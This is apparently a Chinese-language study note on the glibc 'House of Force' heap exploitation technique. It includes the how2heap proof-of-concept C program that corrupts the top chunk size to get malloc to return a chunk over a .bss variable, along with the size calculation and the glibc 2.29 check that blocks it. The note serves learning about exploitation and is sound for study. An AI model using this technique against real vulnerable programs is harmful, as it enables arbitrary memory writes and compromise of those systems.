house of force

跳过了mmap overlapping chunks，哪天有心情详细研究下相关源码和机制再写吧（感觉也不太会用到），先搞简单的house of force

原理

控制top chunk的大小为一个很大的值（-1），如果我们已知top chunk和我们需要控制的地址的插值就能直接申请chunk到那里

利用

2.29以前

实验代码如下（来自how2heap）：

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
#include <assert.h>

char bss_var[] = "This is a string that we want to overwrite.";

int main(int argc , char* argv[])
{
	intptr_t *p1 = malloc(256);
	int real_size = malloc_usable_size(p1);
	intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size - sizeof(long));

	*(intptr_t *)((char *)ptr_top + sizeof(long)) = -1;

	unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*4 - (unsigned long)ptr_top;
	void *new_ptr = malloc(evil_size);
	void* ctr_chunk = malloc(100);

	strcpy(ctr_chunk, "YEAH!!!");

	assert(ctr_chunk == bss_var);
}

利用步骤如下：

• 修改top chunk的大小为-1

• 计算

  evil_size = (unsigned long)bss_var - sizeof(long)*4 - (unsigned long)ptr_top;

  减去4个8字节是减去了申请chunk的presize和size，以及下一个要申请的chunk的presize和size

• 再申请一个chunk，就能控制bss_var的值了

2.29以后

2.29增加了对top chunk的size的合法性的检查，这个方法就失效了

use_top:

  victim = av->top;
  size = chunksize (victim);

  if (__glibc_unlikely (size > av->system_mem))
    malloc_printerr ("malloc(): corrupted top size");